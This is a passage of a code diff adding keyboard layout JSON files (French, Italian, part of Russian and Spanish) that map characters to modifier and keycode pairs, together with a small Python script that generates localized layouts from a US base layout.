"W": [
|
||||
2,
|
||||
26
|
||||
],
|
||||
"X": [
|
||||
2,
|
||||
27
|
||||
],
|
||||
"Y": [
|
||||
2,
|
||||
28
|
||||
],
|
||||
"Z": [
|
||||
2,
|
||||
29
|
||||
],
|
||||
"1": [
|
||||
0,
|
||||
30
|
||||
],
|
||||
"2": [
|
||||
0,
|
||||
31
|
||||
],
|
||||
"3": [
|
||||
0,
|
||||
32
|
||||
],
|
||||
"4": [
|
||||
0,
|
||||
33
|
||||
],
|
||||
"5": [
|
||||
0,
|
||||
34
|
||||
],
|
||||
"6": [
|
||||
0,
|
||||
35
|
||||
],
|
||||
"7": [
|
||||
0,
|
||||
36
|
||||
],
|
||||
"8": [
|
||||
0,
|
||||
37
|
||||
],
|
||||
"9": [
|
||||
0,
|
||||
38
|
||||
],
|
||||
"0": [
|
||||
0,
|
||||
39
|
||||
],
|
||||
"!": [
|
||||
2,
|
||||
30
|
||||
],
|
||||
"@": [
|
||||
2,
|
||||
31
|
||||
],
|
||||
"#": [
|
||||
2,
|
||||
32
|
||||
],
|
||||
"$": [
|
||||
2,
|
||||
33
|
||||
],
|
||||
"%": [
|
||||
2,
|
||||
34
|
||||
],
|
||||
"^": [
|
||||
2,
|
||||
35
|
||||
],
|
||||
"&": [
|
||||
2,
|
||||
36
|
||||
],
|
||||
"*": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"(": [
|
||||
2,
|
||||
38
|
||||
],
|
||||
")": [
|
||||
2,
|
||||
39
|
||||
],
|
||||
"\n": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\r": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\t": [
|
||||
0,
|
||||
43
|
||||
],
|
||||
" ": [
|
||||
0,
|
||||
44
|
||||
],
|
||||
"-": [
|
||||
0,
|
||||
56
|
||||
],
|
||||
"_": [
|
||||
2,
|
||||
56
|
||||
],
|
||||
"=": [
|
||||
0,
|
||||
46
|
||||
],
|
||||
"+": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"[": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"{": [
|
||||
2,
|
||||
47
|
||||
],
|
||||
"]": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"}": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"\\": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"|": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
";": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
":": [
|
||||
2,
|
||||
51
|
||||
],
|
||||
"'": [
|
||||
0,
|
||||
45
|
||||
],
|
||||
"\"": [
|
||||
2,
|
||||
52
|
||||
],
|
||||
"`": [
|
||||
0,
|
||||
53
|
||||
],
|
||||
"~": [
|
||||
2,
|
||||
53
|
||||
],
|
||||
",": [
|
||||
0,
|
||||
54
|
||||
],
|
||||
"<": [
|
||||
0,
|
||||
100
|
||||
],
|
||||
".": [
|
||||
0,
|
||||
55
|
||||
],
|
||||
">": [
|
||||
2,
|
||||
100
|
||||
],
|
||||
"/": [
|
||||
0,
|
||||
56
|
||||
],
|
||||
"?": [
|
||||
2,
|
||||
45
|
||||
],
|
||||
"ñ": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
"Ñ": [
|
||||
2,
|
||||
51
|
||||
],
|
||||
"ç": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"Ç": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
"¡": [
|
||||
0,
|
||||
46
|
||||
],
|
||||
"¿": [
|
||||
2,
|
||||
46
|
||||
],
|
||||
"´": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"¨": [
|
||||
2,
|
||||
47
|
||||
]
|
||||
}
|
||||
446
loki/layouts/fr.json
Normal file
446
loki/layouts/fr.json
Normal file
@@ -0,0 +1,446 @@
|
||||
{
|
||||
"a": [
|
||||
0,
|
||||
20
|
||||
],
|
||||
"b": [
|
||||
0,
|
||||
5
|
||||
],
|
||||
"c": [
|
||||
0,
|
||||
6
|
||||
],
|
||||
"d": [
|
||||
0,
|
||||
7
|
||||
],
|
||||
"e": [
|
||||
0,
|
||||
8
|
||||
],
|
||||
"f": [
|
||||
0,
|
||||
9
|
||||
],
|
||||
"g": [
|
||||
0,
|
||||
10
|
||||
],
|
||||
"h": [
|
||||
0,
|
||||
11
|
||||
],
|
||||
"i": [
|
||||
0,
|
||||
12
|
||||
],
|
||||
"j": [
|
||||
0,
|
||||
13
|
||||
],
|
||||
"k": [
|
||||
0,
|
||||
14
|
||||
],
|
||||
"l": [
|
||||
0,
|
||||
15
|
||||
],
|
||||
"m": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
"n": [
|
||||
0,
|
||||
17
|
||||
],
|
||||
"o": [
|
||||
0,
|
||||
18
|
||||
],
|
||||
"p": [
|
||||
0,
|
||||
19
|
||||
],
|
||||
"q": [
|
||||
0,
|
||||
4
|
||||
],
|
||||
"r": [
|
||||
0,
|
||||
21
|
||||
],
|
||||
"s": [
|
||||
0,
|
||||
22
|
||||
],
|
||||
"t": [
|
||||
0,
|
||||
23
|
||||
],
|
||||
"u": [
|
||||
0,
|
||||
24
|
||||
],
|
||||
"v": [
|
||||
0,
|
||||
25
|
||||
],
|
||||
"w": [
|
||||
0,
|
||||
29
|
||||
],
|
||||
"x": [
|
||||
0,
|
||||
27
|
||||
],
|
||||
"y": [
|
||||
0,
|
||||
28
|
||||
],
|
||||
"z": [
|
||||
0,
|
||||
26
|
||||
],
|
||||
"A": [
|
||||
2,
|
||||
20
|
||||
],
|
||||
"B": [
|
||||
2,
|
||||
5
|
||||
],
|
||||
"C": [
|
||||
2,
|
||||
6
|
||||
],
|
||||
"D": [
|
||||
2,
|
||||
7
|
||||
],
|
||||
"E": [
|
||||
2,
|
||||
8
|
||||
],
|
||||
"F": [
|
||||
2,
|
||||
9
|
||||
],
|
||||
"G": [
|
||||
2,
|
||||
10
|
||||
],
|
||||
"H": [
|
||||
2,
|
||||
11
|
||||
],
|
||||
"I": [
|
||||
2,
|
||||
12
|
||||
],
|
||||
"J": [
|
||||
2,
|
||||
13
|
||||
],
|
||||
"K": [
|
||||
2,
|
||||
14
|
||||
],
|
||||
"L": [
|
||||
2,
|
||||
15
|
||||
],
|
||||
"M": [
|
||||
2,
|
||||
51
|
||||
],
|
||||
"N": [
|
||||
2,
|
||||
17
|
||||
],
|
||||
"O": [
|
||||
2,
|
||||
18
|
||||
],
|
||||
"P": [
|
||||
2,
|
||||
19
|
||||
],
|
||||
"Q": [
|
||||
2,
|
||||
4
|
||||
],
|
||||
"R": [
|
||||
2,
|
||||
21
|
||||
],
|
||||
"S": [
|
||||
2,
|
||||
22
|
||||
],
|
||||
"T": [
|
||||
2,
|
||||
23
|
||||
],
|
||||
"U": [
|
||||
2,
|
||||
24
|
||||
],
|
||||
"V": [
|
||||
2,
|
||||
25
|
||||
],
|
||||
"W": [
|
||||
2,
|
||||
29
|
||||
],
|
||||
"X": [
|
||||
2,
|
||||
27
|
||||
],
|
||||
"Y": [
|
||||
2,
|
||||
28
|
||||
],
|
||||
"Z": [
|
||||
2,
|
||||
26
|
||||
],
|
||||
"1": [
|
||||
2,
|
||||
30
|
||||
],
|
||||
"2": [
|
||||
2,
|
||||
31
|
||||
],
|
||||
"3": [
|
||||
2,
|
||||
32
|
||||
],
|
||||
"4": [
|
||||
2,
|
||||
33
|
||||
],
|
||||
"5": [
|
||||
2,
|
||||
34
|
||||
],
|
||||
"6": [
|
||||
2,
|
||||
35
|
||||
],
|
||||
"7": [
|
||||
2,
|
||||
36
|
||||
],
|
||||
"8": [
|
||||
2,
|
||||
37
|
||||
],
|
||||
"9": [
|
||||
2,
|
||||
38
|
||||
],
|
||||
"0": [
|
||||
2,
|
||||
39
|
||||
],
|
||||
"!": [
|
||||
0,
|
||||
56
|
||||
],
|
||||
"@": [
|
||||
64,
|
||||
39
|
||||
],
|
||||
"#": [
|
||||
64,
|
||||
32
|
||||
],
|
||||
"$": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"%": [
|
||||
2,
|
||||
52
|
||||
],
|
||||
"^": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"&": [
|
||||
0,
|
||||
30
|
||||
],
|
||||
"*": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"(": [
|
||||
0,
|
||||
34
|
||||
],
|
||||
")": [
|
||||
0,
|
||||
45
|
||||
],
|
||||
"\n": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\r": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\t": [
|
||||
0,
|
||||
43
|
||||
],
|
||||
" ": [
|
||||
0,
|
||||
44
|
||||
],
|
||||
"-": [
|
||||
0,
|
||||
35
|
||||
],
|
||||
"_": [
|
||||
0,
|
||||
37
|
||||
],
|
||||
"=": [
|
||||
0,
|
||||
46
|
||||
],
|
||||
"+": [
|
||||
2,
|
||||
46
|
||||
],
|
||||
"[": [
|
||||
64,
|
||||
34
|
||||
],
|
||||
"{": [
|
||||
64,
|
||||
33
|
||||
],
|
||||
"]": [
|
||||
64,
|
||||
45
|
||||
],
|
||||
"}": [
|
||||
64,
|
||||
46
|
||||
],
|
||||
"\\": [
|
||||
64,
|
||||
37
|
||||
],
|
||||
"|": [
|
||||
64,
|
||||
35
|
||||
],
|
||||
";": [
|
||||
0,
|
||||
54
|
||||
],
|
||||
":": [
|
||||
0,
|
||||
55
|
||||
],
|
||||
"'": [
|
||||
0,
|
||||
33
|
||||
],
|
||||
"\"": [
|
||||
0,
|
||||
32
|
||||
],
|
||||
"`": [
|
||||
64,
|
||||
36
|
||||
],
|
||||
"~": [
|
||||
64,
|
||||
31
|
||||
],
|
||||
",": [
|
||||
0,
|
||||
16
|
||||
],
|
||||
"<": [
|
||||
0,
|
||||
100
|
||||
],
|
||||
".": [
|
||||
2,
|
||||
54
|
||||
],
|
||||
">": [
|
||||
2,
|
||||
100
|
||||
],
|
||||
"/": [
|
||||
2,
|
||||
55
|
||||
],
|
||||
"?": [
|
||||
2,
|
||||
16
|
||||
],
|
||||
"é": [
|
||||
0,
|
||||
31
|
||||
],
|
||||
"è": [
|
||||
0,
|
||||
36
|
||||
],
|
||||
"ç": [
|
||||
0,
|
||||
38
|
||||
],
|
||||
"à": [
|
||||
0,
|
||||
39
|
||||
],
|
||||
"§": [
|
||||
2,
|
||||
56
|
||||
],
|
||||
"€": [
|
||||
64,
|
||||
8
|
||||
],
|
||||
"°": [
|
||||
2,
|
||||
45
|
||||
],
|
||||
"¨": [
|
||||
2,
|
||||
47
|
||||
],
|
||||
"£": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"¤": [
|
||||
64,
|
||||
48
|
||||
],
|
||||
"µ": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
"ù": [
|
||||
0,
|
||||
52
|
||||
],
|
||||
"²": [
|
||||
0,
|
||||
53
|
||||
]
|
||||
}
|
||||
78
loki/layouts/generate_layouts.py
Normal file
78
loki/layouts/generate_layouts.py
Normal file
@@ -0,0 +1,78 @@
|
||||
"""generate_layouts.py - Generates localized keyboard layout JSON files from a US base layout."""
|
||||
|
||||
import json
|
||||
import os
|
||||
|
||||
# Load the US base layout
|
||||
with open("us.json", "r") as f:
|
||||
US_BASE = json.load(f)
|
||||
|
||||
# Key differences from the US layout
|
||||
# 0 = Normal, 2 = Shift, 64 = AltGr (Right Alt)
|
||||
LAYOUT_DIFFS = {
|
||||
"fr": {
|
||||
"a": [0, 20], "A": [2, 20], "q": [0, 4], "Q": [2, 4],
|
||||
"z": [0, 26], "Z": [2, 26], "w": [0, 29], "W": [2, 29],
|
||||
"m": [0, 51], "M": [2, 51],
|
||||
"1": [2, 30], "2": [2, 31], "3": [2, 32], "4": [2, 33], "5": [2, 34],
|
||||
"6": [2, 35], "7": [2, 36], "8": [2, 37], "9": [2, 38], "0": [2, 39],
|
||||
"&": [0, 30], "é": [0, 31], "\"": [0, 32], "'": [0, 33], "(": [0, 34],
|
||||
"-": [0, 35], "è": [0, 36], "_": [0, 37], "ç": [0, 38], "à": [0, 39],
|
||||
"~": [64, 31], "#": [64, 32], "{": [64, 33], "[": [64, 34], "|": [64, 35],
|
||||
"`": [64, 36], "\\": [64, 37], "^": [0, 47], "@": [64, 39], "]": [64, 45],
|
||||
"}": [64, 46], "!": [0, 56], "§": [2, 56], "€": [64, 8], ")": [0, 45],
|
||||
"°": [2, 45], "=": [0, 46], "+": [2, 46], "¨": [2, 47], "$": [0, 48],
|
||||
"£": [2, 48], "¤": [64, 48], "*": [0, 49], "µ": [2, 49], "ù": [0, 52],
|
||||
"%": [2, 52], "²": [0, 53], ",": [0, 16], "?": [2, 16], ";": [0, 54],
|
||||
".": [2, 54], ":": [0, 55], "/": [2, 55], "<": [0, 100], ">": [2, 100]
|
||||
},
|
||||
"uk": {
|
||||
"\"": [2, 31], "@": [2, 52], "£": [2, 32], "~": [0, 50],
|
||||
"#": [0, 49], "\\": [0, 100], "|": [2, 100]
|
||||
},
|
||||
"de": {
|
||||
"y": [0, 29], "Y": [2, 29], "z": [0, 28], "Z": [2, 28],
|
||||
"ß": [0, 45], "?": [2, 45], "ü": [0, 47], "Ü": [2, 47],
|
||||
"+": [0, 48], "*": [2, 48], "ö": [0, 51], "Ö": [2, 51],
|
||||
"ä": [0, 52], "Ä": [2, 52], "#": [0, 49], "'": [2, 49],
|
||||
"&": [2, 35], "/": [2, 36], "(": [2, 37], ")": [2, 38],
|
||||
"=": [2, 39], "<": [0, 100], ">": [2, 100]
|
||||
},
|
||||
"es": {
|
||||
"ñ": [0, 51], "Ñ": [2, 51], "ç": [0, 49], "Ç": [2, 49],
|
||||
"'": [0, 45], "?": [2, 45], "¡": [0, 46], "¿": [2, 46],
|
||||
"´": [0, 47], "¨": [2, 47], "+": [0, 48], "*": [2, 48],
|
||||
"<": [0, 100], ">": [2, 100], "-": [0, 56], "_": [2, 56]
|
||||
},
|
||||
"it": {
|
||||
"ò": [0, 51], "ç": [2, 51], "à": [0, 52], "°": [2, 52],
|
||||
"ù": [0, 49], "§": [2, 49], "è": [0, 47], "é": [2, 47],
|
||||
"ì": [0, 46], "^": [2, 46], "'": [0, 45], "?": [2, 45],
|
||||
"+": [0, 48], "*": [2, 48], "<": [0, 100], ">": [2, 100],
|
||||
"-": [0, 56], "_": [2, 56]
|
||||
},
|
||||
"ru": {
|
||||
"й": [0, 20], "ц": [0, 26], "у": [0, 8], "к": [0, 21], "е": [0, 23],
|
||||
"н": [0, 28], "г": [0, 24], "ш": [0, 12], "щ": [0, 18], "з": [0, 19],
|
||||
"х": [0, 47], "ъ": [0, 48], "ф": [0, 4], "ы": [0, 22], "в": [0, 7],
|
||||
"а": [0, 4], "п": [0, 10], "р": [0, 11], "о": [0, 13], "л": [0, 14],
|
||||
"д": [0, 15], "ж": [0, 51], "э": [0, 52], "я": [0, 29], "ч": [0, 27],
|
||||
"с": [0, 6], "м": [0, 25], "и": [0, 5], "т": [0, 17], "ь": [0, 16],
|
||||
"б": [0, 54], "ю": [0, 55], "ё": [0, 53], ".": [0, 56], ",": [2, 56],
|
||||
"№": [2, 32], ";": [2, 33], ":": [2, 35], "?": [2, 36]
|
||||
},
|
||||
"zh": {} # ZH uses the exact US layout
|
||||
}
|
||||
|
||||
def generate_layouts():
|
||||
for lang, diff in LAYOUT_DIFFS.items():
|
||||
new_layout = dict(US_BASE)
|
||||
new_layout.update(diff)
|
||||
|
||||
filename = f"{lang}.json"
|
||||
with open(filename, "w", encoding="utf-8") as f:
|
||||
json.dump(new_layout, f, indent=4, ensure_ascii=False)
|
||||
print(f"Generated: {filename} ({len(new_layout)} keys)")
|
||||
|
||||
if __name__ == "__main__":
|
||||
generate_layouts()
|
||||
430
loki/layouts/it.json
Normal file
430
loki/layouts/it.json
Normal file
@@ -0,0 +1,430 @@
|
||||
{
|
||||
"a": [
|
||||
0,
|
||||
4
|
||||
],
|
||||
"b": [
|
||||
0,
|
||||
5
|
||||
],
|
||||
"c": [
|
||||
0,
|
||||
6
|
||||
],
|
||||
"d": [
|
||||
0,
|
||||
7
|
||||
],
|
||||
"e": [
|
||||
0,
|
||||
8
|
||||
],
|
||||
"f": [
|
||||
0,
|
||||
9
|
||||
],
|
||||
"g": [
|
||||
0,
|
||||
10
|
||||
],
|
||||
"h": [
|
||||
0,
|
||||
11
|
||||
],
|
||||
"i": [
|
||||
0,
|
||||
12
|
||||
],
|
||||
"j": [
|
||||
0,
|
||||
13
|
||||
],
|
||||
"k": [
|
||||
0,
|
||||
14
|
||||
],
|
||||
"l": [
|
||||
0,
|
||||
15
|
||||
],
|
||||
"m": [
|
||||
0,
|
||||
16
|
||||
],
|
||||
"n": [
|
||||
0,
|
||||
17
|
||||
],
|
||||
"o": [
|
||||
0,
|
||||
18
|
||||
],
|
||||
"p": [
|
||||
0,
|
||||
19
|
||||
],
|
||||
"q": [
|
||||
0,
|
||||
20
|
||||
],
|
||||
"r": [
|
||||
0,
|
||||
21
|
||||
],
|
||||
"s": [
|
||||
0,
|
||||
22
|
||||
],
|
||||
"t": [
|
||||
0,
|
||||
23
|
||||
],
|
||||
"u": [
|
||||
0,
|
||||
24
|
||||
],
|
||||
"v": [
|
||||
0,
|
||||
25
|
||||
],
|
||||
"w": [
|
||||
0,
|
||||
26
|
||||
],
|
||||
"x": [
|
||||
0,
|
||||
27
|
||||
],
|
||||
"y": [
|
||||
0,
|
||||
28
|
||||
],
|
||||
"z": [
|
||||
0,
|
||||
29
|
||||
],
|
||||
"A": [
|
||||
2,
|
||||
4
|
||||
],
|
||||
"B": [
|
||||
2,
|
||||
5
|
||||
],
|
||||
"C": [
|
||||
2,
|
||||
6
|
||||
],
|
||||
"D": [
|
||||
2,
|
||||
7
|
||||
],
|
||||
"E": [
|
||||
2,
|
||||
8
|
||||
],
|
||||
"F": [
|
||||
2,
|
||||
9
|
||||
],
|
||||
"G": [
|
||||
2,
|
||||
10
|
||||
],
|
||||
"H": [
|
||||
2,
|
||||
11
|
||||
],
|
||||
"I": [
|
||||
2,
|
||||
12
|
||||
],
|
||||
"J": [
|
||||
2,
|
||||
13
|
||||
],
|
||||
"K": [
|
||||
2,
|
||||
14
|
||||
],
|
||||
"L": [
|
||||
2,
|
||||
15
|
||||
],
|
||||
"M": [
|
||||
2,
|
||||
16
|
||||
],
|
||||
"N": [
|
||||
2,
|
||||
17
|
||||
],
|
||||
"O": [
|
||||
2,
|
||||
18
|
||||
],
|
||||
"P": [
|
||||
2,
|
||||
19
|
||||
],
|
||||
"Q": [
|
||||
2,
|
||||
20
|
||||
],
|
||||
"R": [
|
||||
2,
|
||||
21
|
||||
],
|
||||
"S": [
|
||||
2,
|
||||
22
|
||||
],
|
||||
"T": [
|
||||
2,
|
||||
23
|
||||
],
|
||||
"U": [
|
||||
2,
|
||||
24
|
||||
],
|
||||
"V": [
|
||||
2,
|
||||
25
|
||||
],
|
||||
"W": [
|
||||
2,
|
||||
26
|
||||
],
|
||||
"X": [
|
||||
2,
|
||||
27
|
||||
],
|
||||
"Y": [
|
||||
2,
|
||||
28
|
||||
],
|
||||
"Z": [
|
||||
2,
|
||||
29
|
||||
],
|
||||
"1": [
|
||||
0,
|
||||
30
|
||||
],
|
||||
"2": [
|
||||
0,
|
||||
31
|
||||
],
|
||||
"3": [
|
||||
0,
|
||||
32
|
||||
],
|
||||
"4": [
|
||||
0,
|
||||
33
|
||||
],
|
||||
"5": [
|
||||
0,
|
||||
34
|
||||
],
|
||||
"6": [
|
||||
0,
|
||||
35
|
||||
],
|
||||
"7": [
|
||||
0,
|
||||
36
|
||||
],
|
||||
"8": [
|
||||
0,
|
||||
37
|
||||
],
|
||||
"9": [
|
||||
0,
|
||||
38
|
||||
],
|
||||
"0": [
|
||||
0,
|
||||
39
|
||||
],
|
||||
"!": [
|
||||
2,
|
||||
30
|
||||
],
|
||||
"@": [
|
||||
2,
|
||||
31
|
||||
],
|
||||
"#": [
|
||||
2,
|
||||
32
|
||||
],
|
||||
"$": [
|
||||
2,
|
||||
33
|
||||
],
|
||||
"%": [
|
||||
2,
|
||||
34
|
||||
],
|
||||
"^": [
|
||||
2,
|
||||
46
|
||||
],
|
||||
"&": [
|
||||
2,
|
||||
36
|
||||
],
|
||||
"*": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"(": [
|
||||
2,
|
||||
38
|
||||
],
|
||||
")": [
|
||||
2,
|
||||
39
|
||||
],
|
||||
"\n": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\r": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\t": [
|
||||
0,
|
||||
43
|
||||
],
|
||||
" ": [
|
||||
0,
|
||||
44
|
||||
],
|
||||
"-": [
|
||||
0,
|
||||
56
|
||||
],
|
||||
"_": [
|
||||
2,
|
||||
56
|
||||
],
|
||||
"=": [
|
||||
0,
|
||||
46
|
||||
],
|
||||
"+": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"[": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"{": [
|
||||
2,
|
||||
47
|
||||
],
|
||||
"]": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"}": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"\\": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"|": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
";": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
":": [
|
||||
2,
|
||||
51
|
||||
],
|
||||
"'": [
|
||||
0,
|
||||
45
|
||||
],
|
||||
"\"": [
|
||||
2,
|
||||
52
|
||||
],
|
||||
"`": [
|
||||
0,
|
||||
53
|
||||
],
|
||||
"~": [
|
||||
2,
|
||||
53
|
||||
],
|
||||
",": [
|
||||
0,
|
||||
54
|
||||
],
|
||||
"<": [
|
||||
0,
|
||||
100
|
||||
],
|
||||
".": [
|
||||
0,
|
||||
55
|
||||
],
|
||||
">": [
|
||||
2,
|
||||
100
|
||||
],
|
||||
"/": [
|
||||
0,
|
||||
56
|
||||
],
|
||||
"?": [
|
||||
2,
|
||||
45
|
||||
],
|
||||
"ò": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
"ç": [
|
||||
2,
|
||||
51
|
||||
],
|
||||
"à": [
|
||||
0,
|
||||
52
|
||||
],
|
||||
"°": [
|
||||
2,
|
||||
52
|
||||
],
|
||||
"ù": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"§": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
"è": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"é": [
|
||||
2,
|
||||
47
|
||||
],
|
||||
"ì": [
|
||||
0,
|
||||
46
|
||||
]
|
||||
}
|
||||
530
loki/layouts/ru.json
Normal file
530
loki/layouts/ru.json
Normal file
@@ -0,0 +1,530 @@
|
||||
{
|
||||
"a": [
|
||||
0,
|
||||
4
|
||||
],
|
||||
"b": [
|
||||
0,
|
||||
5
|
||||
],
|
||||
"c": [
|
||||
0,
|
||||
6
|
||||
],
|
||||
"d": [
|
||||
0,
|
||||
7
|
||||
],
|
||||
"e": [
|
||||
0,
|
||||
8
|
||||
],
|
||||
"f": [
|
||||
0,
|
||||
9
|
||||
],
|
||||
"g": [
|
||||
0,
|
||||
10
|
||||
],
|
||||
"h": [
|
||||
0,
|
||||
11
|
||||
],
|
||||
"i": [
|
||||
0,
|
||||
12
|
||||
],
|
||||
"j": [
|
||||
0,
|
||||
13
|
||||
],
|
||||
"k": [
|
||||
0,
|
||||
14
|
||||
],
|
||||
"l": [
|
||||
0,
|
||||
15
|
||||
],
|
||||
"m": [
|
||||
0,
|
||||
16
|
||||
],
|
||||
"n": [
|
||||
0,
|
||||
17
|
||||
],
|
||||
"o": [
|
||||
0,
|
||||
18
|
||||
],
|
||||
"p": [
|
||||
0,
|
||||
19
|
||||
],
|
||||
"q": [
|
||||
0,
|
||||
20
|
||||
],
|
||||
"r": [
|
||||
0,
|
||||
21
|
||||
],
|
||||
"s": [
|
||||
0,
|
||||
22
|
||||
],
|
||||
"t": [
|
||||
0,
|
||||
23
|
||||
],
|
||||
"u": [
|
||||
0,
|
||||
24
|
||||
],
|
||||
"v": [
|
||||
0,
|
||||
25
|
||||
],
|
||||
"w": [
|
||||
0,
|
||||
26
|
||||
],
|
||||
"x": [
|
||||
0,
|
||||
27
|
||||
],
|
||||
"y": [
|
||||
0,
|
||||
28
|
||||
],
|
||||
"z": [
|
||||
0,
|
||||
29
|
||||
],
|
||||
"A": [
|
||||
2,
|
||||
4
|
||||
],
|
||||
"B": [
|
||||
2,
|
||||
5
|
||||
],
|
||||
"C": [
|
||||
2,
|
||||
6
|
||||
],
|
||||
"D": [
|
||||
2,
|
||||
7
|
||||
],
|
||||
"E": [
|
||||
2,
|
||||
8
|
||||
],
|
||||
"F": [
|
||||
2,
|
||||
9
|
||||
],
|
||||
"G": [
|
||||
2,
|
||||
10
|
||||
],
|
||||
"H": [
|
||||
2,
|
||||
11
|
||||
],
|
||||
"I": [
|
||||
2,
|
||||
12
|
||||
],
|
||||
"J": [
|
||||
2,
|
||||
13
|
||||
],
|
||||
"K": [
|
||||
2,
|
||||
14
|
||||
],
|
||||
"L": [
|
||||
2,
|
||||
15
|
||||
],
|
||||
"M": [
|
||||
2,
|
||||
16
|
||||
],
|
||||
"N": [
|
||||
2,
|
||||
17
|
||||
],
|
||||
"O": [
|
||||
2,
|
||||
18
|
||||
],
|
||||
"P": [
|
||||
2,
|
||||
19
|
||||
],
|
||||
"Q": [
|
||||
2,
|
||||
20
|
||||
],
|
||||
"R": [
|
||||
2,
|
||||
21
|
||||
],
|
||||
"S": [
|
||||
2,
|
||||
22
|
||||
],
|
||||
"T": [
|
||||
2,
|
||||
23
|
||||
],
|
||||
"U": [
|
||||
2,
|
||||
24
|
||||
],
|
||||
"V": [
|
||||
2,
|
||||
25
|
||||
],
|
||||
"W": [
|
||||
2,
|
||||
26
|
||||
],
|
||||
"X": [
|
||||
2,
|
||||
27
|
||||
],
|
||||
"Y": [
|
||||
2,
|
||||
28
|
||||
],
|
||||
"Z": [
|
||||
2,
|
||||
29
|
||||
],
|
||||
"1": [
|
||||
0,
|
||||
30
|
||||
],
|
||||
"2": [
|
||||
0,
|
||||
31
|
||||
],
|
||||
"3": [
|
||||
0,
|
||||
32
|
||||
],
|
||||
"4": [
|
||||
0,
|
||||
33
|
||||
],
|
||||
"5": [
|
||||
0,
|
||||
34
|
||||
],
|
||||
"6": [
|
||||
0,
|
||||
35
|
||||
],
|
||||
"7": [
|
||||
0,
|
||||
36
|
||||
],
|
||||
"8": [
|
||||
0,
|
||||
37
|
||||
],
|
||||
"9": [
|
||||
0,
|
||||
38
|
||||
],
|
||||
"0": [
|
||||
0,
|
||||
39
|
||||
],
|
||||
"!": [
|
||||
2,
|
||||
30
|
||||
],
|
||||
"@": [
|
||||
2,
|
||||
31
|
||||
],
|
||||
"#": [
|
||||
2,
|
||||
32
|
||||
],
|
||||
"$": [
|
||||
2,
|
||||
33
|
||||
],
|
||||
"%": [
|
||||
2,
|
||||
34
|
||||
],
|
||||
"^": [
|
||||
2,
|
||||
35
|
||||
],
|
||||
"&": [
|
||||
2,
|
||||
36
|
||||
],
|
||||
"*": [
|
||||
2,
|
||||
37
|
||||
],
|
||||
"(": [
|
||||
2,
|
||||
38
|
||||
],
|
||||
")": [
|
||||
2,
|
||||
39
|
||||
],
|
||||
"\n": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\r": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\t": [
|
||||
0,
|
||||
43
|
||||
],
|
||||
" ": [
|
||||
0,
|
||||
44
|
||||
],
|
||||
"-": [
|
||||
0,
|
||||
45
|
||||
],
|
||||
"_": [
|
||||
2,
|
||||
45
|
||||
],
|
||||
"=": [
|
||||
0,
|
||||
46
|
||||
],
|
||||
"+": [
|
||||
2,
|
||||
46
|
||||
],
|
||||
"[": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"{": [
|
||||
2,
|
||||
47
|
||||
],
|
||||
"]": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"}": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"\\": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"|": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
";": [
|
||||
2,
|
||||
33
|
||||
],
|
||||
":": [
|
||||
2,
|
||||
35
|
||||
],
|
||||
"'": [
|
||||
0,
|
||||
52
|
||||
],
|
||||
"\"": [
|
||||
2,
|
||||
52
|
||||
],
|
||||
"`": [
|
||||
0,
|
||||
53
|
||||
],
|
||||
"~": [
|
||||
2,
|
||||
53
|
||||
],
|
||||
",": [
|
||||
2,
|
||||
56
|
||||
],
|
||||
"<": [
|
||||
2,
|
||||
54
|
||||
],
|
||||
".": [
|
||||
0,
|
||||
56
|
||||
],
|
||||
">": [
|
||||
2,
|
||||
55
|
||||
],
|
||||
"/": [
|
||||
0,
|
||||
56
|
||||
],
|
||||
"?": [
|
||||
2,
|
||||
36
|
||||
],
|
||||
"й": [
|
||||
0,
|
||||
20
|
||||
],
|
||||
"ц": [
|
||||
0,
|
||||
26
|
||||
],
|
||||
"у": [
|
||||
0,
|
||||
8
|
||||
],
|
||||
"к": [
|
||||
0,
|
||||
21
|
||||
],
|
||||
"е": [
|
||||
0,
|
||||
23
|
||||
],
|
||||
"н": [
|
||||
0,
|
||||
28
|
||||
],
|
||||
"г": [
|
||||
0,
|
||||
24
|
||||
],
|
||||
"ш": [
|
||||
0,
|
||||
12
|
||||
],
|
||||
"щ": [
|
||||
0,
|
||||
18
|
||||
],
|
||||
"з": [
|
||||
0,
|
||||
19
|
||||
],
|
||||
"х": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
